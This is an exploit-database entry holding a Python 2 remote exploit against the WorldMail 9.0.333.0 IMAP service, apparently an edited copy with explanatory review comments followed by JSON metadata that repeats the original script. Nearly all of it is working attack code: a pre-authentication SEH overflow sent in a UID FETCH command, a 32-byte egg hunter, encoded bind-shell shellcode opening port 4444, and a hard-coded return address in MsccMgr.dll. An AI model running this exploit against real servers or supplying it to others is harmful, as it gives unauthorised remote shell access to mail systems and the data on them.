ID EXPLOITPACK:3439B9EEE23D7D03560010618F92CA88 Type exploitpack Reporter Muhammad EL Harmeel Modified 2015-01-04T17:13:32
Description
PRE AUTHENTICATION Eudora Qualcomm WorldMail 9.0.333.0 IMAPd Service *
Preauthentication Buffer Overflow. *
Tested on: Windows Server 2003 SP1. *
nSEH is overwritten at offset 749 (the SEH handler pointer at 753) of the argument to the UID command. *
Only 79 bytes are left after SEH, so the shellcode was placed before SEH; the code below *
reaches it with a short forward jump from nSEH into a 32-byte egg hunter that scans memory for the "w00tw00t" tag and executes the shellcode that follows it. *
Shellcode: shell_bind_tcp LPORT=4444 EXITFUNC=seh. Bad characters: 0x00, 0x7b *
import sys,socket
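# Usage check: exactly two positional arguments (target host and port).
# The original called an undefined banner() here, which raised NameError
# before the usage text could be printed; the call is dropped.
if len(sys.argv) != 3:
    print("\nUsage: ./worldmail_uid.py <IP> <PORT>\n")
    sys.exit(1)  # non-zero: a usage error is a failure, not success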
# 32-byte Skape-style egg hunter for 32-bit Windows (tested on Server 2003).
# It walks memory page by page, probing each page with the int 0x2e system
# call (syscall #2, NtAccessCheckAndAuditAlarm on XP/2003 x86) so that an
# unmapped page returns STATUS_ACCESS_VIOLATION instead of faulting, and
# looks for the 4-byte tag "w00t" twice in a row; on a hit it jumps to the
# byte right after the second tag, i.e. into the encoded shellcode.
egghunter = (
    "\x66\x81\xCA\xFF\x0F"  # or  dx, 0x0fff   ; jump to the last byte of the page
    "\x42"                  # inc edx          ; next byte / next page
    "\x52"                  # push edx         ; save the probe address
    "\x6A\x02"              # push 0x02
    "\x58"                  # pop  eax         ; eax = syscall number 2
    "\xCD\x2E"              # int  0x2e        ; is [edx] readable?
    "\x3C\x05"              # cmp  al, 0x05    ; low byte of 0xC0000005 (access violation)
    "\x5A"                  # pop  edx
    "\x74\xEF"              # je   -0x11       ; unreadable -> skip the whole page
    "\xB8\x77\x30\x30\x74"  # mov  eax, "w00t" ; the tag (little-endian 't00w')
    "\x8B\xFA"              # mov  edi, edx
    "\xAF"                  # scasd            ; first "w00t"?
    "\x75\xEA"              # jne  -0x16       ; no -> inc edx, keep scanning
    "\xAF"                  # scasd            ; second "w00t"?
    "\x75\xE7"              # jne  -0x19       ; no -> inc edx, keep scanning
    "\xFF\xE7"              # jmp  edi         ; found: execute what follows the egg
)
# Second stage: the 8-byte egg "w00tw00t" (the egg hunter checks the 4-byte
# tag twice, hence the doubling) followed by 368 bytes of encoded shellcode,
# 376 bytes in total. The header describes the payload as shell_bind_tcp on
# port 4444 with EXITFUNC=seh; that is not verifiable from the encoded bytes,
# so regenerate the blob rather than trusting the comment when the port or
# target changes.
# The leading bytes (mov eax,imm32 / fnstenv [esp-0xc] / pop edx /
# mov cl,0x56 / xor [edx+0x13],eax ...) look like a shikata_ga_nai-style
# self-decoding stub: the payload was encoded to avoid 0x00 and 0x7b.
# NOTE(review): because the decoder's xor loop length and key are baked in,
# do not patch individual bytes of this blob - regenerate the whole thing.
shellcode = "w00tw00t" + ("\xb8\x3b\xe5\xd0\x36\xda\xd3\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x56\x31\x42\x13\x83\xc2\x04\x03\x42\x34\x07\x25\xca\xa2\x4e"
"\xc6\x33\x32\x31\x4e\xd6\x03\x63\x34\x92\x31\xb3\x3e\xf6\xb9"
"\x38\x12\xe3\x4a\x4c\xbb\x04\xfb\xfb\x9d\x2b\xfc\xcd\x21\xe7"
"\x3e\x4f\xde\xfa\x12\xaf\xdf\x34\x67\xae\x18\x28\x87\xe2\xf1"
"\x26\x35\x13\x75\x7a\x85\x12\x59\xf0\xb5\x6c\xdc\xc7\x41\xc7"
"\xdf\x17\xf9\x5c\x97\x8f\x72\x3a\x08\xb1\x57\x58\x74\xf8\xdc"
"\xab\x0e\xfb\x34\xe2\xef\xcd\x78\xa9\xd1\xe1\x75\xb3\x16\xc5"
"\x65\xc6\x6c\x35\x18\xd1\xb6\x47\xc6\x54\x2b\xef\x8d\xcf\x8f"
"\x11\x42\x89\x44\x1d\x2f\xdd\x03\x02\xae\x32\x38\x3e\x3b\xb5"
"\xef\xb6\x7f\x92\x2b\x92\x24\xbb\x6a\x7e\x8b\xc4\x6d\x26\x74"
"\x61\xe5\xc5\x61\x13\xa4\x81\x46\x2e\x57\x52\xc0\x39\x24\x60"
"\x4f\x92\xa2\xc8\x18\x3c\x34\x2e\x33\xf8\xaa\xd1\xbb\xf9\xe3"
"\x15\xef\xa9\x9b\xbc\x8f\x21\x5c\x40\x5a\xe5\x0c\xee\x34\x46"
"\xfd\x4e\xe4\x2e\x17\x41\xdb\x4f\x18\x8b\x6a\x48\xd6\xef\x3f"
"\x3f\x1b\x10\xae\xe3\x92\xf6\xba\x0b\xf3\xa1\x52\xee\x20\x7a"
"\xc5\x11\x03\xd6\x5e\x86\x1b\x30\x58\xa9\x9b\x16\xcb\x06\x33"
"\xf1\x9f\x44\x80\xe0\xa0\x40\xa0\x6b\x99\x03\x3a\x02\x68\xb5"
"\x3b\x0f\x1a\x56\xa9\xd4\xda\x11\xd2\x42\x8d\x76\x24\x9b\x5b"
"\x6b\x1f\x35\x79\x76\xf9\x7e\x39\xad\x3a\x80\xc0\x20\x06\xa6"
"\xd2\xfc\x87\xe2\x86\x50\xde\xbc\x70\x17\x88\x0e\x2a\xc1\x67"
"\xd9\xba\x94\x4b\xda\xbc\x98\x81\xac\x20\x28\x7c\xe9\x5f\x85"
"\xe8\xfd\x18\xfb\x88\x02\xf3\xbf\xb7\xf3\xc9\x55\x2f\xaa\xb8"
"\x17\x2d\x4d\x17\x5b\x48\xce\x9d\x24\xaf\xce\xd4\x21\xeb\x48"
"\x05\x58\x64\x3d\x29\xcf\x85\x14")  # 24 lines x 15 bytes + 8 = 368 payload bytes
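# Payload layout (offsets are into `buffer`, i.e. after the IMAP command prefix):
#   0    "A" * 292      filler
#   292  shellcode      egg + encoded stage (376 bytes as shipped)
#   668  NOP sled       pads exactly up to nSEH
#   749  nSEH           "\xEB\x06" = short jmp +6: skips the two NOPs and the
#                       4-byte handler address, landing on the egg hunter
#   753  SEH handler    POP POP RET in MsccMgr.dll = 0x600dcb95, little-endian
#   757  egghunter      32 bytes
#   789  "}" * 32       trailing filler (0x7d; the bad chars are 0x00 and 0x7b)
#
# The sled length is computed from the nSEH offset instead of being hard-coded
# (81 for the shipped shellcode), so swapping in a different-sized stage keeps
# nSEH/SEH at the right place; the egg hunter does not care where the stage sits.
# NOTE(review): the handler address is specific to the MsccMgr.dll build on the
# tested host (Server 2003 has no ASLR, so it is stable per build, not across
# builds) - confirm it in a debugger before using this against another install.
NSEH_OFFSET = 749   # from the header: nSEH overwritten at 749 bytes
FILLER_LEN = 292

nop_len = NSEH_OFFSET - FILLER_LEN - len(shellcode)
if nop_len < 0:
    raise ValueError("shellcode is %d bytes too long to fit before nSEH" % -nop_len)

# `buffer` shadows a Python 2 builtin; the name is kept because the send below uses it.
buffer = "".join([
    "A" * FILLER_LEN,       # junk
    shellcode,              # egg + encoded shellcode
    "\x90" * nop_len,       # NOP sled up to nSEH
    "\xEB\x06\x90\x90",     # nSEH: short jmp +6
    "\x95\xcb\x0d\x60",     # SEH: POP POP RETN @ 0x600dcb95 in MsccMgr.dll (Server 2003)
    egghunter,              # finds "w00tw00t" and executes the code after it
    "}" * 32,               # junk
])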
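# Deliver the payload over a raw TCP connection to the IMAP service.
# This is a Python 2 script (str is bytes); a Python 3 port would need to
# encode the command with latin-1 before sending.
try:
    port = int(sys.argv[2])
except ValueError:
    # The original bare `except:` around connect() swallowed this and
    # mis-reported a bad port as a connection failure.
    print("Port must be an integer\n")
    sys.exit(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)  # do not hang forever if the service never sends a greeting
try:
    s.connect((sys.argv[1], port))
except socket.error:
    s.close()
    print("Can\'t connect to server!\n")
    sys.exit(1)  # non-zero exit on failure

try:
    print("[+] Connecting to victim !")
    data = s.recv(1024)  # IMAP greeting, shown so the operator can confirm the target
    print("[+] " + data.rstrip())
    print("[+] Sending evil buffer...")
    # sendall() keeps writing until the whole 800+ byte command is out;
    # send() may return short and silently truncate the overflow.
    s.sendall('A013 UID FETCH 4827313:4827313 ' + buffer + "\r\n")
finally:
    s.close()  # also runs if recv()/sendall() raise (e.g. timeout, reset)

# Nothing below is verified: the script does not check that the bind shell
# actually opened, it only reports that the payload was delivered.
print("[+] Exploitation Successful\n")
print("[+] Please Connect to port 4444 on victim IP now !\n")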
{"lastseen": "2020-04-01T19:04:14", "references": [], "description": "\n* - PRE AUTHENTICATION Eudora Qualcomm WorldMail 9.0.333.0 IMAPd Service *\n* Preauthentication Buffer Overflow. *\n* - Tested on: Windows Server 2003 SP1. *\n* - SEH gets overwritten at 749 bytes when using UID command. *\n* Only 79 bytes left after SEH, So the shellcode was placed before SEH *\n* and backward jump is used after SEH to execute the shellcode. *\n* - Shellcode: shell_bind_tcp LPORT*4444 EXITFUNC*seh , Bad charcters are 0x00 0x7b *", "edition": 1, "reporter": "Muhammad EL Harmeel", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "2015-01-04T17:13:32", "title": "EudoraQualcomm-WorldMail-9.0.333.0", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:14", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2020-04-01T19:04:14", "rev": 2}, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-01-04T17:13:32", "id": "EXPLOITPACK:3439B9EEE23D7D03560010618F92CA88", "href": "", "viewCount": 1, "sourceData": "import sys,socket\n\nif len(sys.argv)!=3:\n banner()\n print \"\\nUsage: ./worldmail_uid.py <IP> <PORT>\\n\"\n sys.exit(0)\n \negghunter = \"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8\\x77\\x30\\x30\\x74\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7\" # this is the marker/tag: w00t\n \nshellcode = \"w00tw00t\" + 
(\"\\xb8\\x3b\\xe5\\xd0\\x36\\xda\\xd3\\xd9\\x74\\x24\\xf4\\x5a\\x29\\xc9\\xb1\"\n\"\\x56\\x31\\x42\\x13\\x83\\xc2\\x04\\x03\\x42\\x34\\x07\\x25\\xca\\xa2\\x4e\"\n\"\\xc6\\x33\\x32\\x31\\x4e\\xd6\\x03\\x63\\x34\\x92\\x31\\xb3\\x3e\\xf6\\xb9\"\n\"\\x38\\x12\\xe3\\x4a\\x4c\\xbb\\x04\\xfb\\xfb\\x9d\\x2b\\xfc\\xcd\\x21\\xe7\"\n\"\\x3e\\x4f\\xde\\xfa\\x12\\xaf\\xdf\\x34\\x67\\xae\\x18\\x28\\x87\\xe2\\xf1\"\n\"\\x26\\x35\\x13\\x75\\x7a\\x85\\x12\\x59\\xf0\\xb5\\x6c\\xdc\\xc7\\x41\\xc7\"\n\"\\xdf\\x17\\xf9\\x5c\\x97\\x8f\\x72\\x3a\\x08\\xb1\\x57\\x58\\x74\\xf8\\xdc\"\n\"\\xab\\x0e\\xfb\\x34\\xe2\\xef\\xcd\\x78\\xa9\\xd1\\xe1\\x75\\xb3\\x16\\xc5\"\n\"\\x65\\xc6\\x6c\\x35\\x18\\xd1\\xb6\\x47\\xc6\\x54\\x2b\\xef\\x8d\\xcf\\x8f\"\n\"\\x11\\x42\\x89\\x44\\x1d\\x2f\\xdd\\x03\\x02\\xae\\x32\\x38\\x3e\\x3b\\xb5\"\n\"\\xef\\xb6\\x7f\\x92\\x2b\\x92\\x24\\xbb\\x6a\\x7e\\x8b\\xc4\\x6d\\x26\\x74\"\n\"\\x61\\xe5\\xc5\\x61\\x13\\xa4\\x81\\x46\\x2e\\x57\\x52\\xc0\\x39\\x24\\x60\"\n\"\\x4f\\x92\\xa2\\xc8\\x18\\x3c\\x34\\x2e\\x33\\xf8\\xaa\\xd1\\xbb\\xf9\\xe3\"\n\"\\x15\\xef\\xa9\\x9b\\xbc\\x8f\\x21\\x5c\\x40\\x5a\\xe5\\x0c\\xee\\x34\\x46\"\n\"\\xfd\\x4e\\xe4\\x2e\\x17\\x41\\xdb\\x4f\\x18\\x8b\\x6a\\x48\\xd6\\xef\\x3f\"\n\"\\x3f\\x1b\\x10\\xae\\xe3\\x92\\xf6\\xba\\x0b\\xf3\\xa1\\x52\\xee\\x20\\x7a\"\n\"\\xc5\\x11\\x03\\xd6\\x5e\\x86\\x1b\\x30\\x58\\xa9\\x9b\\x16\\xcb\\x06\\x33\"\n\"\\xf1\\x9f\\x44\\x80\\xe0\\xa0\\x40\\xa0\\x6b\\x99\\x03\\x3a\\x02\\x68\\xb5\"\n\"\\x3b\\x0f\\x1a\\x56\\xa9\\xd4\\xda\\x11\\xd2\\x42\\x8d\\x76\\x24\\x9b\\x5b\"\n\"\\x6b\\x1f\\x35\\x79\\x76\\xf9\\x7e\\x39\\xad\\x3a\\x80\\xc0\\x20\\x06\\xa6\"\n\"\\xd2\\xfc\\x87\\xe2\\x86\\x50\\xde\\xbc\\x70\\x17\\x88\\x0e\\x2a\\xc1\\x67\"\n\"\\xd9\\xba\\x94\\x4b\\xda\\xbc\\x98\\x81\\xac\\x20\\x28\\x7c\\xe9\\x5f\\x85\"\n\"\\xe8\\xfd\\x18\\xfb\\x88\\x02\\xf3\\xbf\\xb7\\xf3\\xc9\\x55\\x2f\\xaa\\xb8\"\n\"\\x17\\x2d\\x4d\\x17\\x5b\\x48\\xce\\x9d\\x24\\xaf\\xce\\xd4\\x21\\xeb\\x48\"\n\"\\x05\\x58\\x64\\x3d\\x29\\xcf\\x85\\x14\")\n \n 
\nbuffer = \"A\" * 292 #Junk\nbuffer += shellcode #Shellcode of 368 bytes to spawn a shell listening on port 4444 \nbuffer += \"\\x90\" *81 #Nop Sled to fill the rest of the buffer after the shellcode \nbuffer += \"\\xEB\\x06\\x90\\x90\" #Short JMP of 6 bytes.\nbuffer += \"\\x95\\xcb\\x0d\\x60\" #Memory Address of POP POP RETN sequence at module MsccMgr.dll @ windows server 2003.\nbuffer += egghunter #Egg hunter to search for the tag \"w00tw00t\" and executes the code after it\nbuffer += \"}\" *32 #Junk\n \n \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \ntry:\n s.connect((sys.argv[1],int(sys.argv[2])))\nexcept:\n print \"Can\\'t connect to server!\\n\"\n sys.exit(0)\n \n \n \nprint \"[+] Connecting to victim !\"\ndata=s.recv(1024)\nprint \"[+] \"+data.rstrip()\nprint \"[+] Sending evil buffer...\"\ns.send('A013 UID FETCH 4827313:4827313 '+ buffer + \"\\r\\n\")\ns.close()\nprint \"[+] Exploitation Successful\\n\"\nprint \"[+] Please Connect to port 4444 on victim IP now !\\n\"\n", "cvss": {"score": 0.0, "vector": "NONE"}}